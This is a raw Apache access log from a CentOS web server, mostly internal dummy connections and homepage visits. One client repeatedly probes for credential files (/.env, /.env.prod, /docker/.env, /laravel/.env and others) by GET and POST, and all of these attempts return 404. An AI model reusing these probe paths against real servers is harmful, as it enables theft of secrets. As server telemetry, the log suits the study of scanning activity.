127.0.0.1 - - [21/Mar/2026:13:47:34 +0100] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/8.3.8 (internal dummy connection)"
127.0.0.1 - - [21/Mar/2026:13:47:35 +0100] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/8.3.8 (internal dummy connection)"
127.0.0.1 - - [21/Mar/2026:13:47:36 +0100] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/8.3.8 (internal dummy connection)"
127.0.0.1 - - [21/Mar/2026:13:47:37 +0100] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/8.3.8 (internal dummy connection)"
127.0.0.1 - - [21/Mar/2026:13:47:48 +0100] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/8.3.8 (internal dummy connection)"
127.0.0.1 - - [21/Mar/2026:13:47:49 +0100] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/8.3.8 (internal dummy connection)"
127.0.0.1 - - [21/Mar/2026:13:47:50 +0100] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/8.3.8 (internal dummy connection)"
127.0.0.1 - - [21/Mar/2026:13:47:58 +0100] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/8.3.8 (internal dummy connection)"
127.0.0.1 - - [21/Mar/2026:13:48:09 +0100] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/8.3.8 (internal dummy connection)"
127.0.0.1 - - [21/Mar/2026:13:48:10 +0100] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/8.3.8 (internal dummy connection)"
127.0.0.1 - - [21/Mar/2026:13:48:11 +0100] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/8.3.8 (internal dummy connection)"
127.0.0.1 - - [21/Mar/2026:13:48:12 +0100] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/8.3.8 (internal dummy connection)"
127.0.0.1 - - [21/Mar/2026:13:48:20 +0100] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/8.3.8 (internal dummy connection)"
127.0.0.1 - - [21/Mar/2026:13:48:22 +0100] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/8.3.8 (internal dummy connection)"
127.0.0.1 - - [21/Mar/2026:13:48:23 +0100] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/8.3.8 (internal dummy connection)"
127.0.0.1 - - [21/Mar/2026:13:48:31 +0100] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/8.3.8 (internal dummy connection)"
127.0.0.1 - - [21/Mar/2026:13:48:34 +0100] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/8.3.8 (internal dummy connection)"
127.0.0.1 - - [21/Mar/2026:13:49:19 +0100] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/8.3.8 (internal dummy connection)"
45.128.156.69 - - [21/Mar/2026:13:49:20 +0100] "GET /.env HTTP/1.1" 404 202 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
127.0.0.1 - - [21/Mar/2026:13:49:20 +0100] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/8.3.8 (internal dummy connection)"
45.128.156.69 - - [21/Mar/2026:13:49:20 +0100] "POST /.env HTTP/1.1" 404 202 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
127.0.0.1 - - [21/Mar/2026:13:49:22 +0100] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/8.3.8 (internal dummy connection)"
127.0.0.1 - - [21/Mar/2026:13:49:26 +0100] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/8.3.8 (internal dummy connection)"
127.0.0.1 - - [21/Mar/2026:13:49:36 +0100] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/8.3.8 (internal dummy connection)"
127.0.0.1 - - [21/Mar/2026:13:49:37 +0100] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/8.3.8 (internal dummy connection)"
127.0.0.1 - - [21/Mar/2026:13:49:46 +0100] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/8.3.8 (internal dummy connection)"
204.76.203.212 - - [21/Mar/2026:13:49:56 +0100] "GET / HTTP/1.1" 200 693 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
45.128.156.69 - - [21/Mar/2026:13:51:11 +0100] "GET /application/.env HTTP/1.1" 404 214 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
45.128.156.69 - - [21/Mar/2026:13:51:11 +0100] "POST /application/.env HTTP/1.1" 404 214 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
195.3.221.8 - - [21/Mar/2026:13:51:25 +0100] "GET / HTTP/1.1" 200 693 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
127.0.0.1 - - [21/Mar/2026:13:53:07 +0100] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/8.3.8 (internal dummy connection)"
127.0.0.1 - - [21/Mar/2026:13:53:08 +0100] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/8.3.8 (internal dummy connection)"
127.0.0.1 - - [21/Mar/2026:13:53:09 +0100] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/8.3.8 (internal dummy connection)"
127.0.0.1 - - [21/Mar/2026:13:53:10 +0100] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/8.3.8 (internal dummy connection)"
127.0.0.1 - - [21/Mar/2026:13:53:11 +0100] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/8.3.8 (internal dummy connection)"
127.0.0.1 - - [21/Mar/2026:13:53:12 +0100] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/8.3.8 (internal dummy connection)"
127.0.0.1 - - [21/Mar/2026:13:53:13 +0100] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/8.3.8 (internal dummy connection)"
127.0.0.1 - - [21/Mar/2026:13:53:32 +0100] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/8.3.8 (internal dummy connection)"
127.0.0.1 - - [21/Mar/2026:13:53:34 +0100] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/8.3.8 (internal dummy connection)"
45.128.156.69 - - [21/Mar/2026:13:55:14 +0100] "GET /.env.prod HTTP/1.1" 404 207 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
45.128.156.69 - - [21/Mar/2026:13:55:14 +0100] "POST /.env.prod HTTP/1.1" 404 207 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
127.0.0.1 - - [21/Mar/2026:13:56:10 +0100] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/8.3.8 (internal dummy connection)"
127.0.0.1 - - [21/Mar/2026:13:56:11 +0100] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/8.3.8 (internal dummy connection)"
127.0.0.1 - - [21/Mar/2026:13:56:12 +0100] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/8.3.8 (internal dummy connection)"
127.0.0.1 - - [21/Mar/2026:13:56:13 +0100] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/8.3.8 (internal dummy connection)"
127.0.0.1 - - [21/Mar/2026:13:56:14 +0100] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/8.3.8 (internal dummy connection)"
127.0.0.1 - - [21/Mar/2026:13:56:15 +0100] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/8.3.8 (internal dummy connection)"
127.0.0.1 - - [21/Mar/2026:13:56:16 +0100] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/8.3.8 (internal dummy connection)"
127.0.0.1 - - [21/Mar/2026:13:56:17 +0100] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/8.3.8 (internal dummy connection)"
127.0.0.1 - - [21/Mar/2026:13:56:31 +0100] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/8.3.8 (internal dummy connection)"
161.35.159.150 - - [21/Mar/2026:13:56:55 +0100] "GET / HTTP/1.1" 200 693 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36(KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36 Chrome-Lighthouse"
127.0.0.1 - - [21/Mar/2026:13:57:06 +0100] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/8.3.8 (internal dummy connection)"
45.128.156.69 - - [21/Mar/2026:13:58:08 +0100] "GET /script/.env HTTP/1.1" 404 209 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
45.128.156.69 - - [21/Mar/2026:13:58:08 +0100] "POST /script/.env HTTP/1.1" 404 209 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
43.153.62.161 - - [21/Mar/2026:14:00:25 +0100] "GET / HTTP/1.1" 200 693 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
172.105.82.111 - - [21/Mar/2026:14:00:41 +0100] "GET / HTTP/1.1" 200 693 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.0.0 Safari/537.36"
45.128.156.69 - - [21/Mar/2026:14:00:57 +0100] "GET /live_env HTTP/1.1" 404 206 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
45.128.156.69 - - [21/Mar/2026:14:00:57 +0100] "POST /live_env HTTP/1.1" 404 206 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
172.105.82.111 - - [21/Mar/2026:14:01:07 +0100] "GET /logfiles/ HTTP/1.1" 200 3107 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.0.0 Safari/537.36"
45.128.156.69 - - [21/Mar/2026:14:03:51 +0100] "GET /development/.env HTTP/1.1" 404 214 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
45.128.156.69 - - [21/Mar/2026:14:03:51 +0100] "POST /development/.env HTTP/1.1" 404 214 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
127.0.0.1 - - [21/Mar/2026:14:04:16 +0100] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/8.3.8 (internal dummy connection)"
45.128.156.69 - - [21/Mar/2026:14:04:52 +0100] "GET /enviroments/.env HTTP/1.1" 404 214 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
45.128.156.69 - - [21/Mar/2026:14:04:52 +0100] "POST /enviroments/.env HTTP/1.1" 404 214 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
127.0.0.1 - - [21/Mar/2026:14:06:08 +0100] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/8.3.8 (internal dummy connection)"
127.0.0.1 - - [21/Mar/2026:14:06:48 +0100] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/8.3.8 (internal dummy connection)"
127.0.0.1 - - [21/Mar/2026:14:06:52 +0100] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/8.3.8 (internal dummy connection)"
127.0.0.1 - - [21/Mar/2026:14:06:54 +0100] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/8.3.8 (internal dummy connection)"
127.0.0.1 - - [21/Mar/2026:14:06:56 +0100] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/8.3.8 (internal dummy connection)"
127.0.0.1 - - [21/Mar/2026:14:07:00 +0100] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/8.3.8 (internal dummy connection)"
127.0.0.1 - - [21/Mar/2026:14:07:03 +0100] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/8.3.8 (internal dummy connection)"
127.0.0.1 - - [21/Mar/2026:14:07:04 +0100] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/8.3.8 (internal dummy connection)"
127.0.0.1 - - [21/Mar/2026:14:07:06 +0100] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/8.3.8 (internal dummy connection)"
127.0.0.1 - - [21/Mar/2026:14:07:07 +0100] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/8.3.8 (internal dummy connection)"
162.252.198.211 - - [21/Mar/2026:14:10:02 +0100] "GET / HTTP/1.1" 200 693 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/146.0.0.0 Safari/537.36"
45.128.156.69 - - [21/Mar/2026:14:10:25 +0100] "GET /docker/.env HTTP/1.1" 404 209 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
45.128.156.69 - - [21/Mar/2026:14:10:25 +0100] "POST /docker/.env HTTP/1.1" 404 209 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
127.0.0.1 - - [21/Mar/2026:14:11:18 +0100] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/8.3.8 (internal dummy connection)"
127.0.0.1 - - [21/Mar/2026:14:11:19 +0100] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/8.3.8 (internal dummy connection)"
127.0.0.1 - - [21/Mar/2026:14:11:20 +0100] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/8.3.8 (internal dummy connection)"
45.128.156.69 - - [21/Mar/2026:14:11:20 +0100] "GET /.env.old HTTP/1.1" 404 206 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
45.128.156.69 - - [21/Mar/2026:14:11:20 +0100] "POST /.env.old HTTP/1.1" 404 206 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
127.0.0.1 - - [21/Mar/2026:14:11:21 +0100] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/8.3.8 (internal dummy connection)"
127.0.0.1 - - [21/Mar/2026:14:11:22 +0100] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/8.3.8 (internal dummy connection)"
127.0.0.1 - - [21/Mar/2026:14:11:24 +0100] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/8.3.8 (internal dummy connection)"
127.0.0.1 - - [21/Mar/2026:14:11:28 +0100] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/8.3.8 (internal dummy connection)"
127.0.0.1 - - [21/Mar/2026:14:11:30 +0100] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/8.3.8 (internal dummy connection)"
127.0.0.1 - - [21/Mar/2026:14:11:31 +0100] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/8.3.8 (internal dummy connection)"
127.0.0.1 - - [21/Mar/2026:14:11:40 +0100] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/8.3.8 (internal dummy connection)"
127.0.0.1 - - [21/Mar/2026:14:11:41 +0100] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/8.3.8 (internal dummy connection)"
127.0.0.1 - - [21/Mar/2026:14:11:42 +0100] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/8.3.8 (internal dummy connection)"
127.0.0.1 - - [21/Mar/2026:14:11:43 +0100] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/8.3.8 (internal dummy connection)"
127.0.0.1 - - [21/Mar/2026:14:11:44 +0100] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/8.3.8 (internal dummy connection)"
127.0.0.1 - - [21/Mar/2026:14:11:45 +0100] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/8.3.8 (internal dummy connection)"
127.0.0.1 - - [21/Mar/2026:14:11:46 +0100] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/8.3.8 (internal dummy connection)"
127.0.0.1 - - [21/Mar/2026:14:11:47 +0100] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/8.3.8 (internal dummy connection)"
127.0.0.1 - - [21/Mar/2026:14:11:54 +0100] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/8.3.8 (internal dummy connection)"
127.0.0.1 - - [21/Mar/2026:14:11:57 +0100] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/8.3.8 (internal dummy connection)"
127.0.0.1 - - [21/Mar/2026:14:12:03 +0100] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/8.3.8 (internal dummy connection)"
45.128.156.69 - - [21/Mar/2026:14:12:15 +0100] "GET /laravel/.env HTTP/1.1" 404 210 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
45.128.156.69 - - [21/Mar/2026:14:12:15 +0100] "POST /laravel/.env HTTP/1.1" 404 210 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
45.128.156.69 - - [21/Mar/2026:14:13:07 +0100] "GET /admin-app/.env HTTP/1.1" 404 212 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
45.128.156.69 - - [21/Mar/2026:14:13:08 +0100] "POST /admin-app/.env HTTP/1.1" 404 212 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
43.153.54.138 - - [21/Mar/2026:14:13:12 +0100] "GET / HTTP/1.1" 200 693 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
43.166.226.57 - - [21/Mar/2026:14:13:43 +0100] "GET / HTTP/1.1" 200 693 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
127.0.0.1 - - [21/Mar/2026:14:14:23 +0100] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/8.3.8 (internal dummy connection)"
127.0.0.1 - - [21/Mar/2026:14:14:24 +0100] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/8.3.8 (internal dummy connection)"
127.0.0.1 - - [21/Mar/2026:14:14:25 +0100] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/8.3.8 (internal dummy connection)"
127.0.0.1 - - [21/Mar/2026:14:14:26 +0100] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/8.3.8 (internal dummy connection)"
127.0.0.1 - - [21/Mar/2026:14:14:27 +0100] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/8.3.8 (internal dummy connection)"
127.0.0.1 - - [21/Mar/2026:14:14:28 +0100] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/8.3.8 (internal dummy connection)"
165.22.184.62 - - [21/Mar/2026:14:15:57 +0100] "GET / HTTP/1.1" 200 693 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0"
45.128.156.69 - - [21/Mar/2026:14:16:27 +0100] "GET /system/.env HTTP/1.1" 404 209 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
45.128.156.69 - - [21/Mar/2026:14:16:27 +0100] "POST /system/.env HTTP/1.1" 404 209 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
204.76.203.212 - - [21/Mar/2026:14:16:44 +0100] "GET / HTTP/1.1" 200 693 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
127.0.0.1 - - [21/Mar/2026:14:17:07 +0100] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/8.3.8 (internal dummy connection)"
127.0.0.1 - - [21/Mar/2026:14:17:09 +0100] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/8.3.8 (internal dummy connection)"
127.0.0.1 - - [21/Mar/2026:14:17:13 +0100] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/8.3.8 (internal dummy connection)"
45.128.156.69 - - [21/Mar/2026:14:17:27 +0100] "GET /apps/.env HTTP/1.1" 404 207 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
45.128.156.69 - - [21/Mar/2026:14:17:27 +0100] "POST /apps/.env HTTP/1.1" 404 207 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
45.128.156.69 - - [21/Mar/2026:14:19:09 +0100] "GET /rest/.env HTTP/1.1" 404 207 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
45.128.156.69 - - [21/Mar/2026:14:19:10 +0100] "POST /rest/.env HTTP/1.1" 404 207 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
127.0.0.1 - - [21/Mar/2026:14:19:39 +0100] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/8.3.8 (internal dummy connection)"
